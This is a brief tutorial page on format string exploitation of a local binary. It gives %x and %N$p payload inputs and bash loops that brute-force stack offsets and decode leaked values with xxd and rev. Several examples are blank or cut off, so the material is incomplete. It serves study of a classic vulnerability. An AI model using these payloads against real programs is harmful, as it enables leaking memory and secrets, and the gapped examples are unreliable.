Binary Exploitation with Format String

Last modified: 2023-08-14

Reverse Engineering

This exploitation occurs when a binary is affected a format string that attacker inputs.


If a binary file contains the functionality which reads user input then outputs it, we can abuse format strings.

// example.c
int main()
    char buffer[12];


    return 0;

For example, input %x as below, then we get the value of stack as hex representation.


# Input 1 (read value as hex)
# output

# Input 2 (read multiple values as hex)
%x %x %x %x
# output
78252078 0 ceddc980 447c8d80 0

# Input 3 (read offset values as hex)
# output

# Input 4 (read offset values as hex)
# output

# Input 5 (read pointer address)
# output

# Input 6 (read offset pointer address)
# output


This is an example of exploitation with format string.
We can read pointer addresses/values by brute forcing.

# Brute force pointer
for i in {20..-1}; do echo \%$i\$p | ./example; done

# Brute force pointer & cut & hexdump (reverse) & reverse
# cut -c 15-: Select only N characters (e.g. 15 characters)
# xxd -ps: Output in plain hexdump style
# xxd -r: Reverse operation. Convert hexdump into binary
# rev: Reverse lines characterwise
(for i in {11..6..-1}; do echo \%$i\$p | ./example; done) | grep "The result is" | cut -c 15- | xxd -ps -r | rev